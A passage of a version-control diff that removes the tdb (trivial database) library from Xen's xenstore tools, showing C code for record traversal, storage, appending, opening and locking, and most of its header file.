- - Notice that not doing this optimisation on the - first hash chain is critical. We must guarantee - that we have done at least one fcntl lock at the - start of a search to guarantee that memory is - coherent on SMP systems. If records are added by - others during the search then thats OK, and we - could possibly miss those with this trick, but we - could miss them anyway without this trick, so the - semantics don't change. - - With a non-indexed ldb search this trick gains us a - factor of around 80 in speed on a linux 2.6.x - system (testing using ldbtest). - */ - if (!tlock->off && tlock->hash != 0) { - uint32_t off; - if (tdb->map_ptr) { - for (;tlock->hash < tdb->header.hash_size;tlock->hash++) { - if (0 != *(uint32_t *)(TDB_HASH_TOP(tlock->hash) + (unsigned char *)tdb->map_ptr)) { - break; - } - } - if (tlock->hash == tdb->header.hash_size) { - continue; - } - } else { - if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), &off) == 0 && - off == 0) { - continue; - } - } - } - - if (tdb_lock(tdb, tlock->hash, F_WRLCK) == -1) - return -1; - - /* No previous record? Start at top of chain. */ - if (!tlock->off) { - if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), - &tlock->off) == -1) - goto fail; - } else { - /* Otherwise unlock the previous record. */ - if (unlock_record(tdb, tlock->off) != 0) - goto fail; - } - - if (want_next) { - /* We have offset of old record: grab next */ - if (rec_read(tdb, tlock->off, rec) == -1) - goto fail; - tlock->off = rec->next; - } - - /* Iterate through chain */ - while( tlock->off) { - tdb_off current; - if (rec_read(tdb, tlock->off, rec) == -1) - goto fail; - - /* Detect infinite loops. From "Shlomi Yaakobovich" . */ - if (tlock->off == rec->next) { - TDB_LOG((tdb, 0, "tdb_next_lock: loop detected.\n")); - goto fail; - } - - if (!TDB_DEAD(rec)) { - /* Woohoo: we found one! 
*/ - if (lock_record(tdb, tlock->off) != 0) - goto fail; - return tlock->off; - } - - /* Try to clean dead ones from old traverses */ - current = tlock->off; - tlock->off = rec->next; - if (!tdb->read_only && - do_delete(tdb, current, rec) != 0) - goto fail; - } - tdb_unlock(tdb, tlock->hash, F_WRLCK); - want_next = 0; - } - /* We finished iteration without finding anything */ - return TDB_ERRCODE(TDB_SUCCESS, 0); - - fail: - tlock->off = 0; - if (tdb_unlock(tdb, tlock->hash, F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_next_lock: On error unlock failed!\n")); - return -1; -} - -/* traverse the entire database - calling fn(tdb, key, data) on each element. - return -1 on error or the record count traversed - if fn is NULL then it is not called - a non-zero return value from fn() indicates that the traversal should stop - */ -int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *private) -{ - TDB_DATA key, dbuf; - struct list_struct rec; - struct tdb_traverse_lock tl = { NULL, 0, 0 }; - int ret, count = 0; - - /* This was in the initializaton, above, but the IRIX compiler - * did not like it. 
crh - */ - tl.next = tdb->travlocks.next; - - /* fcntl locks don't stack: beware traverse inside traverse */ - tdb->travlocks.next = &tl; - - /* tdb_next_lock places locks on the record returned, and its chain */ - while ((ret = tdb_next_lock(tdb, &tl, &rec)) > 0) { - count++; - /* now read the full record */ - key.dptr = tdb_alloc_read(tdb, tl.off + sizeof(rec), - rec.key_len + rec.data_len); - if (!key.dptr) { - ret = -1; - if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) - goto out; - if (unlock_record(tdb, tl.off) != 0) - TDB_LOG((tdb, 0, "tdb_traverse: key.dptr == NULL and unlock_record failed!\n")); - goto out; - } - key.dsize = rec.key_len; - dbuf.dptr = key.dptr + rec.key_len; - dbuf.dsize = rec.data_len; - - /* Drop chain lock, call out */ - if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) { - ret = -1; - goto out; - } - if (fn && fn(tdb, key, dbuf, private)) { - /* They want us to terminate traversal */ - ret = count; - if (unlock_record(tdb, tl.off) != 0) { - TDB_LOG((tdb, 0, "tdb_traverse: unlock_record failed!\n"));; - ret = -1; - } - tdb->travlocks.next = tl.next; - SAFE_FREE(key.dptr); - return count; - } - SAFE_FREE(key.dptr); - } -out: - tdb->travlocks.next = tl.next; - if (ret < 0) - return -1; - else - return count; -} - -/* find the first entry in the database and return its key */ -TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb) -{ - TDB_DATA key; - struct list_struct rec; - - /* release any old lock */ - if (unlock_record(tdb, tdb->travlocks.off) != 0) - return tdb_null; - tdb->travlocks.off = tdb->travlocks.hash = 0; - - if (tdb_next_lock(tdb, &tdb->travlocks, &rec) <= 0) - return tdb_null; - /* now read the key */ - key.dsize = rec.key_len; - key.dptr =tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),key.dsize); - if (tdb_unlock(tdb, BUCKET(tdb->travlocks.hash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_firstkey: error occurred while tdb_unlocking!\n")); - return key; -} - -/* find the next entry in the database, returning its key */ -TDB_DATA 
tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA oldkey) -{ - uint32_t oldhash; - TDB_DATA key = tdb_null; - struct list_struct rec; - char *k = NULL; - - /* Is locked key the old key? If so, traverse will be reliable. */ - if (tdb->travlocks.off) { - if (tdb_lock(tdb,tdb->travlocks.hash,F_WRLCK)) - return tdb_null; - if (rec_read(tdb, tdb->travlocks.off, &rec) == -1 - || !(k = tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec), - rec.key_len)) - || memcmp(k, oldkey.dptr, oldkey.dsize) != 0) { - /* No, it wasn't: unlock it and start from scratch */ - if (unlock_record(tdb, tdb->travlocks.off) != 0) - return tdb_null; - if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0) - return tdb_null; - tdb->travlocks.off = 0; - } - - SAFE_FREE(k); - } - - if (!tdb->travlocks.off) { - /* No previous element: do normal find, and lock record */ - tdb->travlocks.off = tdb_find_lock_hash(tdb, oldkey, tdb->hash_fn(&oldkey), F_WRLCK, &rec); - if (!tdb->travlocks.off) - return tdb_null; - tdb->travlocks.hash = BUCKET(rec.full_hash); - if (lock_record(tdb, tdb->travlocks.off) != 0) { - TDB_LOG((tdb, 0, "tdb_nextkey: lock_record failed (%s)!\n", strerror(errno))); - return tdb_null; - } - } - oldhash = tdb->travlocks.hash; - - /* Grab next record: locks chain and returned record, - unlocks old record */ - if (tdb_next_lock(tdb, &tdb->travlocks, &rec) > 0) { - key.dsize = rec.key_len; - key.dptr = tdb_alloc_read(tdb, tdb->travlocks.off+sizeof(rec), - key.dsize); - /* Unlock the chain of this new record */ - if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n")); - } - /* Unlock the chain of old record */ - if (tdb_unlock(tdb, BUCKET(oldhash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n")); - return key; -} - -/* delete an entry in the database given a key */ -static int tdb_delete_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash) -{ - tdb_off rec_ptr; - struct list_struct rec; - int ret; - - if 
(!(rec_ptr = tdb_find_lock_hash(tdb, key, hash, F_WRLCK, &rec))) - return -1; - ret = do_delete(tdb, rec_ptr, &rec); - if (tdb_unlock(tdb, BUCKET(rec.full_hash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_delete: WARNING tdb_unlock failed!\n")); - return ret; -} - -int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key) -{ - uint32_t hash = tdb->hash_fn(&key); - return tdb_delete_hash(tdb, key, hash); -} - -/* store an element in the database, replacing any existing element - with the same key - - return 0 on success, -1 on failure -*/ -int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag) -{ - struct list_struct rec; - uint32_t hash; - tdb_off rec_ptr; - char *p = NULL; - int ret = 0; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1) - return -1; - - /* check for it existing, on insert. */ - if (flag == TDB_INSERT) { - if (tdb_exists_hash(tdb, key, hash)) { - tdb->ecode = TDB_ERR_EXISTS; - goto fail; - } - } else { - /* first try in-place update, on modify or replace. */ - if (tdb_update_hash(tdb, key, hash, dbuf) == 0) - goto out; - if (tdb->ecode == TDB_ERR_NOEXIST && - flag == TDB_MODIFY) { - /* if the record doesn't exist and we are in TDB_MODIFY mode then - we should fail the store */ - goto fail; - } - } - /* reset the error code potentially set by the tdb_update() */ - tdb->ecode = TDB_SUCCESS; - - /* delete any existing record - if it doesn't exist we don't - care. Doing this first reduces fragmentation, and avoids - coalescing with `allocated' block before it's updated. */ - if (flag != TDB_INSERT) - tdb_delete_hash(tdb, key, hash); - - /* Copy key+value *before* allocating free space in case malloc - fails and we are left with a dead spot in the tdb. 
*/ - - if (!(p = (char *)talloc_size(tdb, key.dsize + dbuf.dsize))) { - tdb->ecode = TDB_ERR_OOM; - goto fail; - } - - memcpy(p, key.dptr, key.dsize); - if (dbuf.dsize) - memcpy(p+key.dsize, dbuf.dptr, dbuf.dsize); - - /* we have to allocate some space */ - if (!(rec_ptr = tdb_allocate(tdb, key.dsize + dbuf.dsize, &rec))) - goto fail; - - /* Read hash top into next ptr */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1) - goto fail; - - rec.key_len = key.dsize; - rec.data_len = dbuf.dsize; - rec.full_hash = hash; - rec.magic = TDB_MAGIC; - - /* write out and point the top of the hash chain at it */ - if (rec_write(tdb, rec_ptr, &rec) == -1 - || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+dbuf.dsize)==-1 - || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) { - /* Need to tdb_unallocate() here */ - goto fail; - } - out: - SAFE_FREE(p); - tdb_unlock(tdb, BUCKET(hash), F_WRLCK); - return ret; -fail: - ret = -1; - goto out; -} - -/* Attempt to append data to an entry in place - this only works if the new data size - is <= the old data size and the key exists. - on failure return -1. Record must be locked before calling. -*/ -static int tdb_append_inplace(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA new_dbuf) -{ - struct list_struct rec; - tdb_off rec_ptr; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) - return -1; - - /* Append of 0 is always ok. */ - if (new_dbuf.dsize == 0) - return 0; - - /* must be long enough for key, old data + new data and tailer */ - if (rec.rec_len < key.dsize + rec.data_len + new_dbuf.dsize + sizeof(tdb_off)) { - /* No room. */ - tdb->ecode = TDB_SUCCESS; /* Not really an error */ - return -1; - } - - if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len + rec.data_len, - new_dbuf.dptr, new_dbuf.dsize) == -1) - return -1; - - /* update size */ - rec.data_len += new_dbuf.dsize; - return rec_write(tdb, rec_ptr, &rec); -} - -/* Append to an entry. Create if not exist. 
*/ - -int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf) -{ - struct list_struct rec; - uint32_t hash; - tdb_off rec_ptr; - char *p = NULL; - int ret = 0; - size_t new_data_size = 0; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1) - return -1; - - /* first try in-place. */ - if (tdb_append_inplace(tdb, key, hash, new_dbuf) == 0) - goto out; - - /* reset the error code potentially set by the tdb_append_inplace() */ - tdb->ecode = TDB_SUCCESS; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) { - if (tdb->ecode != TDB_ERR_NOEXIST) - goto fail; - - /* Not found - create. */ - - ret = tdb_store(tdb, key, new_dbuf, TDB_INSERT); - goto out; - } - - new_data_size = rec.data_len + new_dbuf.dsize; - - /* Copy key+old_value+value *before* allocating free space in case malloc - fails and we are left with a dead spot in the tdb. */ - - if (!(p = (char *)talloc_size(tdb, key.dsize + new_data_size))) { - tdb->ecode = TDB_ERR_OOM; - goto fail; - } - - /* Copy the key in place. */ - memcpy(p, key.dptr, key.dsize); - - /* Now read the old data into place. */ - if (rec.data_len && - tdb_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, p + key.dsize, rec.data_len, 0) == -1) - goto fail; - - /* Finally append the new data. */ - if (new_dbuf.dsize) - memcpy(p+key.dsize+rec.data_len, new_dbuf.dptr, new_dbuf.dsize); - - /* delete any existing record - if it doesn't exist we don't - care. Doing this first reduces fragmentation, and avoids - coalescing with `allocated' block before it's updated. 
*/ - - tdb_delete_hash(tdb, key, hash); - - if (!(rec_ptr = tdb_allocate(tdb, key.dsize + new_data_size, &rec))) - goto fail; - - /* Read hash top into next ptr */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1) - goto fail; - - rec.key_len = key.dsize; - rec.data_len = new_data_size; - rec.full_hash = hash; - rec.magic = TDB_MAGIC; - - /* write out and point the top of the hash chain at it */ - if (rec_write(tdb, rec_ptr, &rec) == -1 - || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+new_data_size)==-1 - || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) { - /* Need to tdb_unallocate() here */ - goto fail; - } - - out: - SAFE_FREE(p); - tdb_unlock(tdb, BUCKET(hash), F_WRLCK); - return ret; - -fail: - ret = -1; - goto out; -} - -static int tdb_already_open(dev_t device, - ino_t ino) -{ - TDB_CONTEXT *i; - - for (i = tdbs; i; i = i->next) { - if (i->device == device && i->inode == ino) { - return 1; - } - } - - return 0; -} - -/* open the database, creating it if necessary - - The open_flags and mode are passed straight to the open call on the - database file. A flags value of O_WRONLY is invalid. The hash size - is advisory, use zero for a default value. - - Return is NULL on error, in which case errno is also set. Don't - try to call tdb_error or tdb_errname, just do strerror(errno). - - @param name may be NULL for internal databases. */ -TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode) -{ - return tdb_open_ex(name, hash_size, tdb_flags, open_flags, mode, NULL, NULL); -} - -/* a default logging function */ -static void null_log_fn(TDB_CONTEXT *tdb __attribute__((unused)), - int level __attribute__((unused)), - const char *fmt __attribute__((unused)), ...) 
-{ -} - - -TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode, - tdb_log_func log_fn, - tdb_hash_func hash_fn) -{ - TDB_CONTEXT *tdb; - struct stat st; - int rev = 0, locked = 0; - uint8_t *vp; - uint32_t vertest; - - if (!(tdb = talloc_zero(name, TDB_CONTEXT))) { - /* Can't log this */ - errno = ENOMEM; - goto fail; - } - tdb->fd = -1; - tdb->name = NULL; - tdb->map_ptr = NULL; - tdb->flags = tdb_flags; - tdb->open_flags = open_flags; - tdb->log_fn = log_fn?log_fn:null_log_fn; - tdb->hash_fn = hash_fn ? hash_fn : default_tdb_hash; - - if ((open_flags & O_ACCMODE) == O_WRONLY) { - TDB_LOG((tdb, 0, "tdb_open_ex: can't open tdb %s write-only\n", - name)); - errno = EINVAL; - goto fail; - } - - if (hash_size == 0) - hash_size = DEFAULT_HASH_SIZE; - if ((open_flags & O_ACCMODE) == O_RDONLY) { - tdb->read_only = 1; - /* read only databases don't do locking or clear if first */ - tdb->flags |= TDB_NOLOCK; - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - } - - /* internal databases don't mmap or lock, and start off cleared */ - if (tdb->flags & TDB_INTERNAL) { - tdb->flags |= (TDB_NOLOCK | TDB_NOMMAP); - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - if (tdb_new_database(tdb, hash_size) != 0) { - TDB_LOG((tdb, 0, "tdb_open_ex: tdb_new_database failed!")); - goto fail; - } - goto internal; - } - - if ((tdb->fd = open(name, open_flags, mode)) == -1) { - TDB_LOG((tdb, 5, "tdb_open_ex: could not open file %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by open(2) */ - } - - /* ensure there is only one process initialising at once */ - if (tdb_brlock(tdb, GLOBAL_LOCK, F_WRLCK, F_SETLKW, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: failed to get global lock on %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by tdb_brlock */ - } - - /* we need to zero database if we are the only one with it open */ - if ((tdb_flags & TDB_CLEAR_IF_FIRST) && - (locked = (tdb_brlock(tdb, ACTIVE_LOCK, F_WRLCK, F_SETLK, 0) == 0))) { - 
open_flags |= O_CREAT; - if (ftruncate(tdb->fd, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: " - "failed to truncate %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by ftruncate */ - } - } - - if (read(tdb->fd, &tdb->header, sizeof(tdb->header)) != sizeof(tdb->header) - || strcmp(tdb->header.magic_food, TDB_MAGIC_FOOD) != 0 - || (tdb->header.version != TDB_VERSION - && !(rev = (tdb->header.version==TDB_BYTEREV(TDB_VERSION))))) { - /* its not a valid database - possibly initialise it */ - if (!(open_flags & O_CREAT) || tdb_new_database(tdb, hash_size) == -1) { - errno = EIO; /* ie bad format or something */ - goto fail; - } - rev = (tdb->flags & TDB_CONVERT); - } - vp = (uint8_t *)&tdb->header.version; - vertest = (((uint32_t)vp[0]) << 24) | (((uint32_t)vp[1]) << 16) | - (((uint32_t)vp[2]) << 8) | (uint32_t)vp[3]; - tdb->flags |= (vertest==TDB_VERSION) ? TDB_BIGENDIAN : 0; - if (!rev) - tdb->flags &= ~TDB_CONVERT; - else { - tdb->flags |= TDB_CONVERT; - convert(&tdb->header, sizeof(tdb->header)); - } - if (fstat(tdb->fd, &st) == -1) - goto fail; - - /* Is it already in the open list? If so, fail. 
*/ - if (tdb_already_open(st.st_dev, st.st_ino)) { - TDB_LOG((tdb, 2, "tdb_open_ex: " - "%s (%d,%d) is already open in this process\n", - name, (int)st.st_dev, (int)st.st_ino)); - errno = EBUSY; - goto fail; - } - - if (!(tdb->name = (char *)talloc_strdup(tdb, name))) { - errno = ENOMEM; - goto fail; - } - - tdb->map_size = st.st_size; - tdb->device = st.st_dev; - tdb->inode = st.st_ino; - tdb->locked = talloc_zero_array(tdb, struct tdb_lock_type, - tdb->header.hash_size+1); - if (!tdb->locked) { - TDB_LOG((tdb, 2, "tdb_open_ex: " - "failed to allocate lock structure for %s\n", - name)); - errno = ENOMEM; - goto fail; - } - tdb_mmap(tdb); - if (locked) { - if (tdb_brlock(tdb, ACTIVE_LOCK, F_UNLCK, F_SETLK, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: " - "failed to take ACTIVE_LOCK on %s: %s\n", - name, strerror(errno))); - goto fail; - } - - } - - /* We always need to do this if the CLEAR_IF_FIRST flag is set, even if - we didn't get the initial exclusive lock as we need to let all other - users know we're using it. */ - - if (tdb_flags & TDB_CLEAR_IF_FIRST) { - /* leave this lock in place to indicate it's in use */ - if (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1) - goto fail; - } - - - internal: - /* Internal (memory-only) databases skip all the code above to - * do with disk files, and resume here by releasing their - * global lock and hooking into the active list. */ - if (tdb_brlock(tdb, GLOBAL_LOCK, F_UNLCK, F_SETLKW, 0) == -1) - goto fail; - tdb->next = tdbs; - tdbs = tdb; - return tdb; - - fail: - { int save_errno = errno; - - if (!tdb) - return NULL; - - if (tdb->map_ptr) { - if (tdb->flags & TDB_INTERNAL) - SAFE_FREE(tdb->map_ptr); - else - tdb_munmap(tdb); - } - SAFE_FREE(tdb->name); - if (tdb->fd != -1) - if (close(tdb->fd) != 0) - TDB_LOG((tdb, 5, "tdb_open_ex: failed to close tdb->fd on error!\n")); - SAFE_FREE(tdb->locked); - SAFE_FREE(tdb); - errno = save_errno; - return NULL; - } -} - -/** - * Close a database. 
- * - * @returns -1 for error; 0 for success. - **/ -int tdb_close(TDB_CONTEXT *tdb) -{ - TDB_CONTEXT **i; - int ret = 0; - - if (tdb->map_ptr) { - if (tdb->flags & TDB_INTERNAL) - SAFE_FREE(tdb->map_ptr); - else - tdb_munmap(tdb); - } - SAFE_FREE(tdb->name); - if (tdb->fd != -1) - ret = close(tdb->fd); - SAFE_FREE(tdb->locked); - - /* Remove from contexts list */ - for (i = &tdbs; *i; i = &(*i)->next) { - if (*i == tdb) { - *i = tdb->next; - break; - } - } - - memset(tdb, 0, sizeof(*tdb)); - SAFE_FREE(tdb); - - return ret; -} - -/* lock/unlock entire database */ -int tdb_lockall(TDB_CONTEXT *tdb) -{ - uint32_t i; - - /* There are no locks on read-only dbs */ - if (tdb->read_only) - return TDB_ERRCODE(TDB_ERR_LOCK, -1); - for (i = 0; i < tdb->header.hash_size; i++) - if (tdb_lock(tdb, i, F_WRLCK)) - break; - - /* If error, release locks we have... */ - if (i < tdb->header.hash_size) { - uint32_t j; - - for ( j = 0; j < i; j++) - tdb_unlock(tdb, j, F_WRLCK); - return TDB_ERRCODE(TDB_ERR_NOLOCK, -1); - } - - return 0; -} -void tdb_unlockall(TDB_CONTEXT *tdb) -{ - uint32_t i; - for (i=0; i < tdb->header.hash_size; i++) - tdb_unlock(tdb, i, F_WRLCK); -} - -/* lock/unlock one hash chain. 
This is meant to be used to reduce - contention - it cannot guarantee how many records will be locked */ -int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK); -} - -int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK); -} - -int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK); -} - -int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK); -} - - -/* register a loging function */ -void tdb_logging_function(TDB_CONTEXT *tdb, void (*fn)(TDB_CONTEXT *, int , const char *, ...)) -{ - tdb->log_fn = fn?fn:null_log_fn; -} - - -/* reopen a tdb - this can be used after a fork to ensure that we have an independent - seek pointer from our parent and to re-establish locks */ -int tdb_reopen(TDB_CONTEXT *tdb) -{ - struct stat st; - - if (tdb->flags & TDB_INTERNAL) - return 0; /* Nothing to do. 
*/ - if (tdb_munmap(tdb) != 0) { - TDB_LOG((tdb, 0, "tdb_reopen: munmap failed (%s)\n", strerror(errno))); - goto fail; - } - if (close(tdb->fd) != 0) - TDB_LOG((tdb, 0, "tdb_reopen: WARNING closing tdb->fd failed!\n")); - tdb->fd = open(tdb->name, tdb->open_flags & ~(O_CREAT|O_TRUNC), 0); - if (tdb->fd == -1) { - TDB_LOG((tdb, 0, "tdb_reopen: open failed (%s)\n", strerror(errno))); - goto fail; - } - if (fstat(tdb->fd, &st) != 0) { - TDB_LOG((tdb, 0, "tdb_reopen: fstat failed (%s)\n", strerror(errno))); - goto fail; - } - if (st.st_ino != tdb->inode || st.st_dev != tdb->device) { - TDB_LOG((tdb, 0, "tdb_reopen: file dev/inode has changed!\n")); - goto fail; - } - tdb_mmap(tdb); - if ((tdb->flags & TDB_CLEAR_IF_FIRST) && (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1)) { - TDB_LOG((tdb, 0, "tdb_reopen: failed to obtain active lock\n")); - goto fail; - } - - return 0; - -fail: - tdb_close(tdb); - return -1; -} - -/* Not general: only works if single writer. */ -TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile) -{ - int fd, saved_errno; - TDB_CONTEXT *copy; - - fd = open(outfile, O_TRUNC|O_CREAT|O_WRONLY, 0640); - if (fd < 0) - return NULL; - if (tdb->map_ptr) { - if (write(fd,tdb->map_ptr,tdb->map_size) != (int)tdb->map_size) - goto fail; - } else { - char buf[65536]; - int r; - - lseek(tdb->fd, 0, SEEK_SET); - while ((r = read(tdb->fd, buf, sizeof(buf))) > 0) { - if (write(fd, buf, r) != r) - goto fail; - } - if (r < 0) - goto fail; - } - copy = tdb_open(outfile, 0, 0, O_RDWR, 0); - if (!copy) - goto fail; - close(fd); - return copy; - -fail: - saved_errno = errno; - close(fd); - unlink(outfile); - errno = saved_errno; - return NULL; -} - -/* reopen all tdb's */ -int tdb_reopen_all(void) -{ - TDB_CONTEXT *tdb; - - for (tdb=tdbs; tdb; tdb = tdb->next) { - /* Ensure no clear-if-first. 
*/ - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - if (tdb_reopen(tdb) != 0) - return -1; - } - - return 0; -} diff -r 10a8fae412c5 tools/xenstore/tdb.h --- a/tools/xenstore/tdb.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,157 +0,0 @@ -#ifndef __TDB_H__ -#define __TDB_H__ - -/* - Unix SMB/CIFS implementation. - - trivial database library - - Copyright (C) Andrew Tridgell 1999-2004 - - ** NOTE! The following LGPL license applies to the tdb - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. 
- - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifdef __cplusplus -extern "C" { -#endif - - -/* flags to tdb_store() */ -#define TDB_REPLACE 1 -#define TDB_INSERT 2 -#define TDB_MODIFY 3 - -/* flags for tdb_open() */ -#define TDB_DEFAULT 0 /* just a readability place holder */ -#define TDB_CLEAR_IF_FIRST 1 -#define TDB_INTERNAL 2 /* don't store on disk */ -#define TDB_NOLOCK 4 /* don't do any locking */ -#define TDB_NOMMAP 8 /* don't use mmap */ -#define TDB_CONVERT 16 /* convert endian (internal use) */ -#define TDB_BIGENDIAN 32 /* header is big-endian (internal use) */ - -#define TDB_ERRCODE(code, ret) ((tdb->ecode = (code)), ret) - -/* error codes */ -enum TDB_ERROR {TDB_SUCCESS=0, TDB_ERR_CORRUPT, TDB_ERR_IO, TDB_ERR_LOCK, - TDB_ERR_OOM, TDB_ERR_EXISTS, TDB_ERR_NOLOCK, TDB_ERR_LOCK_TIMEOUT, - TDB_ERR_NOEXIST}; - -#ifndef uint32_t -#define uint32_t unsigned -#endif - -typedef struct TDB_DATA { - char *dptr; - size_t dsize; -} TDB_DATA; - -typedef uint32_t tdb_len; -typedef uint32_t tdb_off; - -/* this is stored at the front of every database */ -struct tdb_header { - char magic_food[32]; /* for /etc/magic */ - uint32_t version; /* version of the code */ - uint32_t hash_size; /* number of hash entries */ - tdb_off rwlocks; - tdb_off reserved[31]; -}; - -struct tdb_lock_type { - uint32_t count; - uint32_t ltype; -}; - -struct tdb_traverse_lock { - struct tdb_traverse_lock *next; - uint32_t off; - uint32_t hash; -}; - -#ifndef PRINTF_ATTRIBUTE -#define PRINTF_ATTRIBUTE(a,b) -#endif - -/* this is the context structure that is returned from a db open */ -typedef struct tdb_context { - char *name; /* the name of the database */ - void *map_ptr; /* where it is currently mapped */ - int fd; /* open file descriptor for the database */ - tdb_len map_size; /* how much space has been mapped */ - int 
read_only; /* opened read-only */ - struct tdb_lock_type *locked; /* array of chain locks */ - enum TDB_ERROR ecode; /* error code for last tdb error */ - struct tdb_header header; /* a cached copy of the header */ - uint32_t flags; /* the flags passed to tdb_open */ - struct tdb_traverse_lock travlocks; /* current traversal locks */ - struct tdb_context *next; /* all tdbs to avoid multiple opens */ - dev_t device; /* uniquely identifies this tdb */ - ino_t inode; /* uniquely identifies this tdb */ - void (*log_fn)(struct tdb_context *tdb, int level, const char *, ...) PRINTF_ATTRIBUTE(3,4); /* logging function */ - uint32_t (*hash_fn)(TDB_DATA *key); - int open_flags; /* flags used in the open - needed by reopen */ -} TDB_CONTEXT; - -typedef int (*tdb_traverse_func)(TDB_CONTEXT *, TDB_DATA, TDB_DATA, void *); -typedef void (*tdb_log_func)(TDB_CONTEXT *, int , const char *, ...); -typedef uint32_t (*tdb_hash_func)(TDB_DATA *key); - -TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode); -TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode, - tdb_log_func log_fn, - tdb_hash_func hash_fn); - -int tdb_reopen(TDB_CONTEXT *tdb); -int tdb_reopen_all(void); -void tdb_logging_function(TDB_CONTEXT *tdb, tdb_log_func); -enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb); -const char *tdb_errorstr(TDB_CONTEXT *tdb); -TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag); -int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf); -int tdb_close(TDB_CONTEXT *tdb); -TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb); -TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *); -int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_lockall(TDB_CONTEXT *tdb); -void tdb_unlockall(TDB_CONTEXT *tdb); - -/* Low level 
